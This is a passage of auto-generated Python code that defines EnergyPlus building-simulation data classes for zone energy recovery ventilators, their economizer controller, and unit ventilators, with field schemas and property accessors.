'autocalculatable': False,
'type': u'real',
'unit': u'm3/s'}),
(u'supply air fan name',
{'name': u'Supply Air Fan Name',
'pyname': u'supply_air_fan_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'exhaust air fan name',
{'name': u'Exhaust Air Fan Name',
'pyname': u'exhaust_air_fan_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'controller name',
{'name': u'Controller Name',
'pyname': u'controller_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'ventilation rate per unit floor area',
{'name': u'Ventilation Rate per Unit Floor Area',
'pyname': u'ventilation_rate_per_unit_floor_area',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s-m2'}),
(u'ventilation rate per occupant',
{'name': u'Ventilation Rate per Occupant',
'pyname': u'ventilation_rate_per_occupant',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s-person'}),
(u'availability manager list name',
{'name': u'Availability Manager List Name',
'pyname': u'availability_manager_list_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'})]),
'format': None,
'group': u'Zone HVAC Forced Air Units',
'min-fields': 7,
'name': u'ZoneHVAC:EnergyRecoveryVentilator',
'pyname': u'ZoneHvacEnergyRecoveryVentilator',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def availability_schedule_name(self):
"""field `Availability Schedule Name`
| Availability schedule name for this system. Schedule value > 0 means the system is available.
| If this field is blank, the system is always available.
Args:
value (str): value for IDD Field `Availability Schedule Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `availability_schedule_name` or None if not set
"""
return self["Availability Schedule Name"]
@availability_schedule_name.setter
def availability_schedule_name(self, value=None):
"""Corresponds to IDD field `Availability Schedule Name`"""
self["Availability Schedule Name"] = value
@property
def heat_exchanger_name(self):
"""field `Heat Exchanger Name`
| Heat exchanger type must be HeatExchanger:AirToAir:SensibleAndLatent
Args:
value (str): value for IDD Field `Heat Exchanger Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `heat_exchanger_name` or None if not set
"""
return self["Heat Exchanger Name"]
@heat_exchanger_name.setter
def heat_exchanger_name(self, value=None):
"""Corresponds to IDD field `Heat Exchanger Name`"""
self["Heat Exchanger Name"] = value
@property
def supply_air_flow_rate(self):
    """Return the current value of IDD field `Supply Air Flow Rate`.

    This flow rate must match the supply fan's air flow rate.
    Units: m3/s

    Returns:
        float or "Autosize": the value of `supply_air_flow_rate`, or
        None if not set.
    """
    return self["Supply Air Flow Rate"]

@supply_air_flow_rate.setter
def supply_air_flow_rate(self, value=None):
    """Set IDD field `Supply Air Flow Rate`.

    Args:
        value (float or "Autosize"): new value for the field.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    self["Supply Air Flow Rate"] = value

@property
def exhaust_air_flow_rate(self):
    """Return the current value of IDD field `Exhaust Air Flow Rate`.

    This flow rate must match the supply fan air flow rate.
    Units: m3/s

    Returns:
        float or "Autosize": the value of `exhaust_air_flow_rate`, or
        None if not set.
    """
    return self["Exhaust Air Flow Rate"]

@exhaust_air_flow_rate.setter
def exhaust_air_flow_rate(self, value=None):
    """Set IDD field `Exhaust Air Flow Rate`.

    Args:
        value (float or "Autosize"): new value for the field.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    self["Exhaust Air Flow Rate"] = value
@property
def supply_air_fan_name(self):
    """Return the current value of IDD field `Supply Air Fan Name`.

    Fan type must be Fan:OnOff.

    Returns:
        str: the value of `supply_air_fan_name`, or None if not set.
    """
    return self["Supply Air Fan Name"]

@supply_air_fan_name.setter
def supply_air_fan_name(self, value=None):
    """Set IDD field `Supply Air Fan Name`.

    Args:
        value (str): new value for the field.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    self["Supply Air Fan Name"] = value

@property
def exhaust_air_fan_name(self):
    """Return the current value of IDD field `Exhaust Air Fan Name`.

    Fan type must be Fan:OnOff.

    Returns:
        str: the value of `exhaust_air_fan_name`, or None if not set.
    """
    return self["Exhaust Air Fan Name"]

@exhaust_air_fan_name.setter
def exhaust_air_fan_name(self, value=None):
    """Set IDD field `Exhaust Air Fan Name`.

    Args:
        value (str): new value for the field.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    self["Exhaust Air Fan Name"] = value
@property
def controller_name(self):
    """Return the current value of IDD field `Controller Name`.

    Enter the name of a ZoneHVAC:EnergyRecoveryVentilator:Controller
    object.

    Returns:
        str: the value of `controller_name`, or None if not set.
    """
    return self["Controller Name"]

@controller_name.setter
def controller_name(self, value=None):
    """Set IDD field `Controller Name`.

    Args:
        value (str): new value for the field.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    self["Controller Name"] = value

@property
def ventilation_rate_per_unit_floor_area(self):
    """Return the current value of IDD field `Ventilation Rate per Unit Floor Area`.

    0.000508 m3/s-m2 corresponds to 0.1 ft3/min-ft2. Used only when
    supply and exhaust air flow rates are autosized.
    Units: m3/s-m2

    Returns:
        float: the value of `ventilation_rate_per_unit_floor_area`, or
        None if not set.
    """
    return self["Ventilation Rate per Unit Floor Area"]

@ventilation_rate_per_unit_floor_area.setter
def ventilation_rate_per_unit_floor_area(self, value=None):
    """Set IDD field `Ventilation Rate per Unit Floor Area`.

    Args:
        value (float): new value for the field.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    self["Ventilation Rate per Unit Floor Area"] = value
@property
def ventilation_rate_per_occupant(self):
    """Return the current value of IDD field `Ventilation Rate per Occupant`.

    0.00236 m3/s-person corresponds to 5 ft3/min-person. Used only when
    supply and exhaust air flow rates are autosized.
    Units: m3/s-person

    Returns:
        float: the value of `ventilation_rate_per_occupant`, or None if
        not set.
    """
    return self["Ventilation Rate per Occupant"]

@ventilation_rate_per_occupant.setter
def ventilation_rate_per_occupant(self, value=None):
    """Set IDD field `Ventilation Rate per Occupant`.

    Args:
        value (float): new value for the field.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    self["Ventilation Rate per Occupant"] = value

@property
def availability_manager_list_name(self):
    """Return the current value of IDD field `Availability Manager List Name`.

    Enter the name of an AvailabilityManagerAssignmentList object.

    Returns:
        str: the value of `availability_manager_list_name`, or None if
        not set.
    """
    return self["Availability Manager List Name"]

@availability_manager_list_name.setter
def availability_manager_list_name(self, value=None):
    """Set IDD field `Availability Manager List Name`.

    Args:
        value (str): new value for the field.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    self["Availability Manager List Name"] = value
class ZoneHvacEnergyRecoveryVentilatorController(DataObject):

    """Corresponds to IDD object `ZoneHVAC:EnergyRecoveryVentilator:Controller`.

    This controller is used exclusively by the
    ZoneHVAC:EnergyRecoveryVentilator object to allow economizer (free
    cooling) operation when possible.
    """

    # Auto-generated IDD schema: per-field metadata keyed by the
    # lower-case IDD field name. Field order must match the IDD.
    _schema = {
        'extensible-fields': OrderedDict(),
        'fields': OrderedDict([
            (u'name',
             {'name': u'Name', 'pyname': u'name', 'required-field': True,
              'autosizable': False, 'autocalculatable': False,
              'type': u'alpha'}),
            (u'temperature high limit',
             {'name': u'Temperature High Limit',
              'pyname': u'temperature_high_limit', 'required-field': False,
              'autosizable': False, 'autocalculatable': False,
              'type': u'real', 'unit': u'C'}),
            (u'temperature low limit',
             {'name': u'Temperature Low Limit',
              'pyname': u'temperature_low_limit', 'required-field': False,
              'autosizable': False, 'autocalculatable': False,
              'type': u'real', 'unit': u'C'}),
            (u'enthalpy high limit',
             {'name': u'Enthalpy High Limit',
              'pyname': u'enthalpy_high_limit', 'required-field': False,
              'autosizable': False, 'autocalculatable': False,
              'type': u'real', 'unit': u'J/kg'}),
            (u'dewpoint temperature limit',
             {'name': u'Dewpoint Temperature Limit',
              'pyname': u'dewpoint_temperature_limit',
              'required-field': False, 'autosizable': False,
              'autocalculatable': False, 'type': u'real', 'unit': u'C'}),
            (u'electronic enthalpy limit curve name',
             {'name': u'Electronic Enthalpy Limit Curve Name',
              'pyname': u'electronic_enthalpy_limit_curve_name',
              'required-field': False, 'autosizable': False,
              'autocalculatable': False, 'type': u'object-list'}),
            (u'exhaust air temperature limit',
             {'name': u'Exhaust Air Temperature Limit',
              'pyname': u'exhaust_air_temperature_limit',
              'default': u'NoExhaustAirTemperatureLimit',
              'required-field': False, 'autosizable': False,
              'accepted-values': [u'ExhaustAirTemperatureLimit',
                                  u'NoExhaustAirTemperatureLimit'],
              'autocalculatable': False, 'type': 'alpha'}),
            (u'exhaust air enthalpy limit',
             {'name': u'Exhaust Air Enthalpy Limit',
              'pyname': u'exhaust_air_enthalpy_limit',
              'default': u'NoExhaustAirEnthalpyLimit',
              'required-field': False, 'autosizable': False,
              'accepted-values': [u'ExhaustAirEnthalpyLimit',
                                  u'NoExhaustAirEnthalpyLimit'],
              'autocalculatable': False, 'type': 'alpha'}),
            (u'time of day economizer flow control schedule name',
             {'name': u'Time of Day Economizer Flow Control Schedule Name',
              'pyname': u'time_of_day_economizer_flow_control_schedule_name',
              'required-field': False, 'autosizable': False,
              'autocalculatable': False, 'type': u'object-list'}),
            (u'high humidity control flag',
             {'name': u'High Humidity Control Flag',
              'pyname': u'high_humidity_control_flag', 'default': u'No',
              'required-field': False, 'autosizable': False,
              'accepted-values': [u'Yes', u'No'],
              'autocalculatable': False, 'type': 'alpha'}),
            (u'humidistat control zone name',
             {'name': u'Humidistat Control Zone Name',
              'pyname': u'humidistat_control_zone_name',
              'required-field': False, 'autosizable': False,
              'autocalculatable': False, 'type': u'object-list'}),
            (u'high humidity outdoor air flow ratio',
             {'name': u'High Humidity Outdoor Air Flow Ratio',
              'pyname': u'high_humidity_outdoor_air_flow_ratio',
              'default': 1.0, 'minimum>': 0.0, 'required-field': False,
              'autosizable': False, 'autocalculatable': False,
              'type': u'real'}),
            (u'control high indoor humidity based on outdoor humidity ratio',
             {'name': u'Control High Indoor Humidity Based on Outdoor Humidity Ratio',
              'pyname': u'control_high_indoor_humidity_based_on_outdoor_humidity_ratio',
              'default': u'Yes', 'required-field': False,
              'autosizable': False, 'accepted-values': [u'Yes', u'No'],
              'autocalculatable': False, 'type': 'alpha'})]),
        'format': None,
        'group': u'Zone HVAC Forced Air Units',
        'min-fields': 3,
        'name': u'ZoneHVAC:EnergyRecoveryVentilator:Controller',
        'pyname': u'ZoneHvacEnergyRecoveryVentilatorController',
        'required-object': False,
        'unique-object': False}

    @property
    def name(self):
        """Return the current value of IDD field `Name`.

        Returns:
            str: the value of `name`, or None if not set.
        """
        return self["Name"]

    @name.setter
    def name(self, value=None):
        """Set IDD field `Name`.

        Args:
            value (str): new value for the field.

        Raises:
            ValueError: if `value` is not a valid value.
        """
        self["Name"] = value

    @property
    def temperature_high_limit(self):
        """Return the current value of IDD field `Temperature High Limit`.

        Maximum outdoor dry-bulb temperature limit for economizer
        operation. No input or blank input means this limit is not
        operative. Units: C

        Returns:
            float: the value of `temperature_high_limit`, or None if not set.
        """
        return self["Temperature High Limit"]

    @temperature_high_limit.setter
    def temperature_high_limit(self, value=None):
        """Set IDD field `Temperature High Limit`.

        Args:
            value (float): new value for the field.

        Raises:
            ValueError: if `value` is not a valid value.
        """
        self["Temperature High Limit"] = value

    @property
    def temperature_low_limit(self):
        """Return the current value of IDD field `Temperature Low Limit`.

        Minimum outdoor dry-bulb temperature limit for economizer
        operation. No input or blank input means this limit is not
        operative. Units: C

        Returns:
            float: the value of `temperature_low_limit`, or None if not set.
        """
        return self["Temperature Low Limit"]

    @temperature_low_limit.setter
    def temperature_low_limit(self, value=None):
        """Set IDD field `Temperature Low Limit`.

        Args:
            value (float): new value for the field.

        Raises:
            ValueError: if `value` is not a valid value.
        """
        self["Temperature Low Limit"] = value

    @property
    def enthalpy_high_limit(self):
        """Return the current value of IDD field `Enthalpy High Limit`.

        Maximum outdoor enthalpy limit for economizer operation. No
        input or blank input means this limit is not operative.
        Units: J/kg

        Returns:
            float: the value of `enthalpy_high_limit`, or None if not set.
        """
        return self["Enthalpy High Limit"]

    @enthalpy_high_limit.setter
    def enthalpy_high_limit(self, value=None):
        """Set IDD field `Enthalpy High Limit`.

        Args:
            value (float): new value for the field.

        Raises:
            ValueError: if `value` is not a valid value.
        """
        self["Enthalpy High Limit"] = value

    @property
    def dewpoint_temperature_limit(self):
        """Return the current value of IDD field `Dewpoint Temperature Limit`.

        Maximum outdoor dew point temperature limit for economizer
        operation. No input or blank input means this limit is not
        operative. Units: C

        Returns:
            float: the value of `dewpoint_temperature_limit`, or None if
            not set.
        """
        return self["Dewpoint Temperature Limit"]

    @dewpoint_temperature_limit.setter
    def dewpoint_temperature_limit(self, value=None):
        """Set IDD field `Dewpoint Temperature Limit`.

        Args:
            value (float): new value for the field.

        Raises:
            ValueError: if `value` is not a valid value.
        """
        self["Dewpoint Temperature Limit"] = value

    @property
    def electronic_enthalpy_limit_curve_name(self):
        """Return the current value of IDD field `Electronic Enthalpy Limit Curve Name`.

        Name of a quadratic or cubic curve which defines the maximum
        outdoor humidity ratio (function of outdoor dry-bulb
        temperature) for economizer operation. No input or blank input
        means this limit is not operative.

        Returns:
            str: the value of `electronic_enthalpy_limit_curve_name`, or
            None if not set.
        """
        return self["Electronic Enthalpy Limit Curve Name"]

    @electronic_enthalpy_limit_curve_name.setter
    def electronic_enthalpy_limit_curve_name(self, value=None):
        """Set IDD field `Electronic Enthalpy Limit Curve Name`.

        Args:
            value (str): new value for the field.

        Raises:
            ValueError: if `value` is not a valid value.
        """
        self["Electronic Enthalpy Limit Curve Name"] = value

    @property
    def exhaust_air_temperature_limit(self):
        """Return the current value of IDD field `Exhaust Air Temperature Limit`.

        Default value: NoExhaustAirTemperatureLimit

        Returns:
            str: the value of `exhaust_air_temperature_limit`, or None
            if not set.
        """
        return self["Exhaust Air Temperature Limit"]

    @exhaust_air_temperature_limit.setter
    def exhaust_air_temperature_limit(self, value="NoExhaustAirTemperatureLimit"):
        """Set IDD field `Exhaust Air Temperature Limit`.

        Args:
            value (str): new value for the field.

        Raises:
            ValueError: if `value` is not a valid value.
        """
        self["Exhaust Air Temperature Limit"] = value

    @property
    def exhaust_air_enthalpy_limit(self):
        """Return the current value of IDD field `Exhaust Air Enthalpy Limit`.

        Default value: NoExhaustAirEnthalpyLimit

        Returns:
            str: the value of `exhaust_air_enthalpy_limit`, or None if
            not set.
        """
        return self["Exhaust Air Enthalpy Limit"]

    @exhaust_air_enthalpy_limit.setter
    def exhaust_air_enthalpy_limit(self, value="NoExhaustAirEnthalpyLimit"):
        """Set IDD field `Exhaust Air Enthalpy Limit`.

        Args:
            value (str): new value for the field.

        Raises:
            ValueError: if `value` is not a valid value.
        """
        self["Exhaust Air Enthalpy Limit"] = value

    @property
    def time_of_day_economizer_flow_control_schedule_name(self):
        """Return the current value of IDD field `Time of Day Economizer Flow Control Schedule Name`.

        Schedule values greater than 0 indicate economizer operation is
        active. This schedule may be used with or without the High
        Humidity Control option. When used together, high humidity
        control has priority over economizer control.

        Returns:
            str: the value of
            `time_of_day_economizer_flow_control_schedule_name`, or
            None if not set.
        """
        return self["Time of Day Economizer Flow Control Schedule Name"]

    @time_of_day_economizer_flow_control_schedule_name.setter
    def time_of_day_economizer_flow_control_schedule_name(self, value=None):
        """Set IDD field `Time of Day Economizer Flow Control Schedule Name`.

        Args:
            value (str): new value for the field.

        Raises:
            ValueError: if `value` is not a valid value.
        """
        self["Time of Day Economizer Flow Control Schedule Name"] = value

    @property
    def high_humidity_control_flag(self):
        """Return the current value of IDD field `High Humidity Control Flag`.

        Select Yes to modify air flow rates based on a zone humidistat;
        select No to disable this feature. Default value: No

        Returns:
            str: the value of `high_humidity_control_flag`, or None if
            not set.
        """
        return self["High Humidity Control Flag"]

    @high_humidity_control_flag.setter
    def high_humidity_control_flag(self, value="No"):
        """Set IDD field `High Humidity Control Flag`.

        Args:
            value (str): new value for the field.

        Raises:
            ValueError: if `value` is not a valid value.
        """
        self["High Humidity Control Flag"] = value

    @property
    def humidistat_control_zone_name(self):
        """Return the current value of IDD field `Humidistat Control Zone Name`.

        Name of the zone where the humidistat is located.

        Returns:
            str: the value of `humidistat_control_zone_name`, or None if
            not set.
        """
        return self["Humidistat Control Zone Name"]

    @humidistat_control_zone_name.setter
    def humidistat_control_zone_name(self, value=None):
        """Set IDD field `Humidistat Control Zone Name`.

        Args:
            value (str): new value for the field.

        Raises:
            ValueError: if `value` is not a valid value.
        """
        self["Humidistat Control Zone Name"] = value

    @property
    def high_humidity_outdoor_air_flow_ratio(self):
        """Return the current value of IDD field `High Humidity Outdoor Air Flow Ratio`.

        Ratio of supply (outdoor) air to the maximum supply air flow
        rate when modified air flow rates are active based on high
        indoor humidity. Default value: 1.0

        Returns:
            float: the value of `high_humidity_outdoor_air_flow_ratio`,
            or None if not set.
        """
        return self["High Humidity Outdoor Air Flow Ratio"]

    @high_humidity_outdoor_air_flow_ratio.setter
    def high_humidity_outdoor_air_flow_ratio(self, value=1.0):
        """Set IDD field `High Humidity Outdoor Air Flow Ratio`.

        Args:
            value (float): new value for the field.

        Raises:
            ValueError: if `value` is not a valid value.
        """
        self["High Humidity Outdoor Air Flow Ratio"] = value

    @property
    def control_high_indoor_humidity_based_on_outdoor_humidity_ratio(self):
        """Return the current value of IDD field `Control High Indoor Humidity Based on Outdoor Humidity Ratio`.

        If No is selected, the air flow rate is modified any time indoor
        relative humidity is above the humidistat setpoint. If Yes is
        selected, the outdoor air flow rate is modified any time indoor
        relative humidity is above the humidistat setpoint AND the
        outdoor humidity ratio is less than the indoor humidity ratio.
        Default value: Yes

        Returns:
            str: the value of
            `control_high_indoor_humidity_based_on_outdoor_humidity_ratio`,
            or None if not set.
        """
        return self[
            "Control High Indoor Humidity Based on Outdoor Humidity Ratio"]

    @control_high_indoor_humidity_based_on_outdoor_humidity_ratio.setter
    def control_high_indoor_humidity_based_on_outdoor_humidity_ratio(self, value="Yes"):
        """Set IDD field `Control High Indoor Humidity Based on Outdoor Humidity Ratio`.

        Args:
            value (str): new value for the field.

        Raises:
            ValueError: if `value` is not a valid value.
        """
        self[
            "Control High Indoor Humidity Based on Outdoor Humidity Ratio"] = value
class ZoneHvacUnitVentilator(DataObject):
""" Corresponds to IDD object `ZoneHVAC:UnitVentilator`
Unit ventilator. Forced-convection ventilation unit with supply fan (constant-volume
or variable-volume), optional chilled water cooling coil, optional heating coil
(gas, electric, hot water, or steam) and controllable outdoor air mixer.
"""
# Auto-generated IDD schema for ZoneHVAC:UnitVentilator: per-field
# metadata keyed by the lower-case IDD field name; order matches the IDD.
_schema = {
    'extensible-fields': OrderedDict(),
    'fields': OrderedDict([
        (u'name',
         {'name': u'Name', 'pyname': u'name', 'required-field': True,
          'autosizable': False, 'autocalculatable': False,
          'type': 'alpha'}),
        (u'availability schedule name',
         {'name': u'Availability Schedule Name',
          'pyname': u'availability_schedule_name', 'required-field': False,
          'autosizable': False, 'autocalculatable': False,
          'type': u'object-list'}),
        (u'maximum supply air flow rate',
         {'name': u'Maximum Supply Air Flow Rate',
          'pyname': u'maximum_supply_air_flow_rate', 'minimum>': 0.0,
          'required-field': True, 'autosizable': True,
          'autocalculatable': False, 'type': 'real', 'unit': u'm3/s'}),
        (u'outdoor air control type',
         {'name': u'Outdoor Air Control Type',
          'pyname': u'outdoor_air_control_type', 'required-field': True,
          'autosizable': False,
          'accepted-values': [u'FixedAmount', u'VariablePercent',
                              u'FixedTemperature'],
          'autocalculatable': False, 'type': 'alpha'}),
        (u'minimum outdoor air flow rate',
         {'name': u'Minimum Outdoor Air Flow Rate',
          'pyname': u'minimum_outdoor_air_flow_rate',
          'required-field': True, 'autosizable': True, 'minimum': 0.0,
          'autocalculatable': False, 'type': 'real', 'unit': u'm3/s'}),
        (u'minimum outdoor air schedule name',
         {'name': u'Minimum Outdoor Air Schedule Name',
          'pyname': u'minimum_outdoor_air_schedule_name',
          'required-field': True, 'autosizable': False,
          'autocalculatable': False, 'type': u'object-list'}),
        (u'maximum outdoor air flow rate',
         {'name': u'Maximum Outdoor Air Flow Rate',
          'pyname': u'maximum_outdoor_air_flow_rate',
          'required-field': True, 'autosizable': True, 'minimum': 0.0,
          'autocalculatable': False, 'type': 'real', 'unit': u'm3/s'}),
        (u'maximum outdoor air fraction or temperature schedule name',
         {'name': u'Maximum Outdoor Air Fraction or Temperature Schedule Name',
          'pyname': u'maximum_outdoor_air_fraction_or_temperature_schedule_name',
          'required-field': True, 'autosizable': False,
          'autocalculatable': False, 'type': u'object-list'}),
        (u'air inlet node name',
         {'name': u'Air Inlet Node Name', 'pyname': u'air_inlet_node_name',
          'required-field': True, 'autosizable': False,
          'autocalculatable': False, 'type': u'node'}),
        (u'air outlet node name',
         {'name': u'Air Outlet Node Name',
          'pyname': u'air_outlet_node_name', 'required-field': True,
          'autosizable': False, 'autocalculatable': False,
          'type': u'node'}),
        (u'outdoor air node name',
         {'name': u'Outdoor Air Node Name',
          'pyname': u'outdoor_air_node_name', 'required-field': True,
          'autosizable': False, 'autocalculatable': False,
          'type': u'node'}),
        (u'exhaust air node name',
         {'name': u'Exhaust Air Node Name',
          'pyname': u'exhaust_air_node_name', 'required-field': True,
          'autosizable': False, 'autocalculatable': False,
          'type': u'node'}),
        (u'mixed air node name',
         {'name': u'Mixed Air Node Name', 'pyname': u'mixed_air_node_name',
          'required-field': True, 'autosizable': False,
          'autocalculatable': False, 'type': u'node'}),
        (u'supply air fan object type',
         {'name': u'Supply Air Fan Object Type',
          'pyname': u'supply_air_fan_object_type', 'required-field': True,
          'autosizable': False,
          'accepted-values': [u'Fan:OnOff', u'Fan:ConstantVolume',
                              u'Fan:VariableVolume'],
          'autocalculatable': False, 'type': 'alpha'}),
        (u'supply air fan name',
         {'name': u'Supply Air Fan Name', 'pyname': u'supply_air_fan_name',
          'required-field': True, 'autosizable': False,
          'autocalculatable': False, 'type': u'object-list'}),
        (u'coil option',
         {'name': u'Coil Option', 'pyname': u'coil_option',
          'required-field': True, 'autosizable': False,
          'accepted-values': [u'None', u'Heating', u'Cooling',
                              u'HeatingAndCooling'],
          'autocalculatable': False, 'type': 'alpha'}),
        (u'supply air fan operating mode schedule name',
         {'name': u'Supply Air Fan Operating Mode Schedule Name',
          'pyname': u'supply_air_fan_operating_mode_schedule_name',
          'required-field': False, 'autosizable': False,
          'autocalculatable': False, 'type': u'object-list'}),
        (u'heating coil object type',
         {'name': u'Heating Coil Object Type',
          'pyname': u'heating_coil_object_type', 'required-field': False,
          'autosizable': False,
          'accepted-values': [u'Coil:Heating:Water',
                              u'Coil:Heating:Electric',
                              u'Coil:Heating:Gas', u'Coil:Heating:Steam'],
          'autocalculatable': False, 'type': 'alpha'}),
        (u'heating coil name',
         {'name': u'Heating Coil Name', 'pyname': u'heating_coil_name',
          'required-field': False, 'autosizable': False,
          'autocalculatable': False, 'type': u'object-list'}),
        (u'heating convergence tolerance',
         {'name': u'Heating Convergence Tolerance',
          'pyname': u'heating_convergence_tolerance', 'default': 0.001,
          'minimum>': 0.0, 'required-field': False, 'autosizable': False,
          'autocalculatable': False, 'type': u'real'}),
        (u'cooling coil object type',
         {'name': u'Cooling Coil Object Type',
          'pyname': u'cooling_coil_object_type', 'required-field': False,
          'autosizable': False,
          'accepted-values': [u'Coil:Cooling:Water',
                              u'Coil:Cooling:Water:DetailedGeometry',
                              u'CoilSystem:Cooling:Water:HeatExchangerAssisted'],
          'autocalculatable': False, 'type': 'alpha'}),
        (u'cooling coil name',
         {'name': u'Cooling Coil Name', 'pyname': u'cooling_coil_name',
          'required-field': False, 'autosizable': False,
          'autocalculatable': False, 'type': u'object-list'}),
        (u'cooling convergence tolerance',
         {'name': u'Cooling Convergence Tolerance',
          'pyname': u'cooling_convergence_tolerance', 'default': 0.001,
          'minimum>': 0.0, 'required-field': False, 'autosizable': False,
          'autocalculatable': False, 'type': u'real'}),
        (u'availability manager list name',
         {'name': u'Availability Manager List Name',
          'pyname': u'availability_manager_list_name',
          'required-field': False, 'autosizable': False,
          'autocalculatable': False, 'type': u'object-list'}),
        (u'design specification zonehvac sizing object name',
         {'name': u'Design Specification ZoneHVAC Sizing Object Name',
          'pyname': u'design_specification_zonehvac_sizing_object_name',
          'required-field': False, 'autosizable': False,
          'autocalculatable': False, 'type': u'object-list'})]),
    'format': None,
    'group': u'Zone HVAC Forced Air Units',
    'min-fields': 16,
    'name': u'ZoneHVAC:UnitVentilator',
    'pyname': u'ZoneHvacUnitVentilator',
    'required-object': False,
    'unique-object': False}
@property
def name(self):
    """Return the current value of IDD field `Name`.

    Returns:
        str: the value of `name`, or None if not set.
    """
    return self["Name"]

@name.setter
def name(self, value=None):
    """Set IDD field `Name`.

    Args:
        value (str): new value for the field.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    self["Name"] = value

@property
def availability_schedule_name(self):
    """Return the current value of IDD field `Availability Schedule Name`.

    A schedule value > 0 means the system is available; if this field
    is blank, the system is always available.

    Returns:
        str: the value of `availability_schedule_name`, or None if not set.
    """
    return self["Availability Schedule Name"]

@availability_schedule_name.setter
def availability_schedule_name(self, value=None):
    """Set IDD field `Availability Schedule Name`.

    Args:
        value (str): new value for the field.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    self["Availability Schedule Name"] = value
@property
def maximum_supply_air_flow_rate(self):
    """Return the current value of IDD field `Maximum Supply Air Flow Rate`.

    Units: m3/s

    Returns:
        float or "Autosize": the value of `maximum_supply_air_flow_rate`,
        or None if not set.
    """
    return self["Maximum Supply Air Flow Rate"]

@maximum_supply_air_flow_rate.setter
def maximum_supply_air_flow_rate(self, value=None):
    """Set IDD field `Maximum Supply Air Flow Rate`.

    Args:
        value (float or "Autosize"): new value for the field.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    self["Maximum Supply Air Flow Rate"] = value

@property
def outdoor_air_control_type(self):
    """Return the current value of IDD field `Outdoor Air Control Type`.

    Returns:
        str: the value of `outdoor_air_control_type`, or None if not set.
    """
    return self["Outdoor Air Control Type"]

@outdoor_air_control_type.setter
def outdoor_air_control_type(self, value=None):
    """Set IDD field `Outdoor Air Control Type`.

    Args:
        value (str): new value for the field.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    self["Outdoor Air Control Type"] = value
@property
def minimum_outdoor_air_flow_rate(self):
    """Return the current value of IDD field `Minimum Outdoor Air Flow Rate`.

    Units: m3/s

    Returns:
        float or "Autosize": the value of `minimum_outdoor_air_flow_rate`,
        or None if not set.
    """
    return self["Minimum Outdoor Air Flow Rate"]

@minimum_outdoor_air_flow_rate.setter
def minimum_outdoor_air_flow_rate(self, value=None):
    """Set IDD field `Minimum Outdoor Air Flow Rate`.

    Args:
        value (float or "Autosize"): new value for the field.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    self["Minimum Outdoor Air Flow Rate"] = value

@property
def minimum_outdoor_air_schedule_name(self):
    """Return the current value of IDD field `Minimum Outdoor Air Schedule Name`.

    Schedule values multiply the minimum outdoor air flow rate.

    Returns:
        str: the value of `minimum_outdoor_air_schedule_name`, or None
        if not set.
    """
    return self["Minimum Outdoor Air Schedule Name"]

@minimum_outdoor_air_schedule_name.setter
def minimum_outdoor_air_schedule_name(self, value=None):
    """Set IDD field `Minimum Outdoor Air Schedule Name`.

    Args:
        value (str): new value for the field.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    self["Minimum Outdoor Air Schedule Name"] = value
@property
def maximum_outdoor_air_flow_rate(self):
    """Return the current value of IDD field `Maximum Outdoor Air Flow Rate`.

    Units: m3/s

    Returns:
        float or "Autosize": the value of `maximum_outdoor_air_flow_rate`,
        or None if not set.
    """
    return self["Maximum Outdoor Air Flow Rate"]

@maximum_outdoor_air_flow_rate.setter
def maximum_outdoor_air_flow_rate(self, value=None):
    """Set IDD field `Maximum Outdoor Air Flow Rate`.

    Args:
        value (float or "Autosize"): new value for the field.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    self["Maximum Outdoor Air Flow Rate"] = value

@property
def maximum_outdoor_air_fraction_or_temperature_schedule_name(self):
    """Return the current value of IDD field `Maximum Outdoor Air Fraction or Temperature Schedule Name`.

    Whether the schedule holds a fraction or a temperature depends on
    the outdoor air control type.

    Returns:
        str: the value of
        `maximum_outdoor_air_fraction_or_temperature_schedule_name`, or
        None if not set.
    """
    return self[
        "Maximum Outdoor Air Fraction or Temperature Schedule Name"]

@maximum_outdoor_air_fraction_or_temperature_schedule_name.setter
def maximum_outdoor_air_fraction_or_temperature_schedule_name(self, value=None):
    """Set IDD field `Maximum Outdoor Air Fraction or Temperature Schedule Name`.

    Args:
        value (str): new value for the field.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    self[
        "Maximum Outdoor Air Fraction or Temperature Schedule Name"] = value
@property
def air_inlet_node_name(self):
    """Return the current value of IDD field `Air Inlet Node Name`.

    Returns:
        str: the value of `air_inlet_node_name`, or None if not set.
    """
    return self["Air Inlet Node Name"]

@air_inlet_node_name.setter
def air_inlet_node_name(self, value=None):
    """Set IDD field `Air Inlet Node Name`.

    Args:
        value (str): new value for the field.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    self["Air Inlet Node Name"] = value

@property
def air_outlet_node_name(self):
    """Return the current value of IDD field `Air Outlet Node Name`.

    Returns:
        str: the value of `air_outlet_node_name`, or None if not set.
    """
    return self["Air Outlet Node Name"]

@air_outlet_node_name.setter
def air_outlet_node_name(self, value=None):
    """Set IDD field `Air Outlet Node Name`.

    Args:
        value (str): new value for the field.

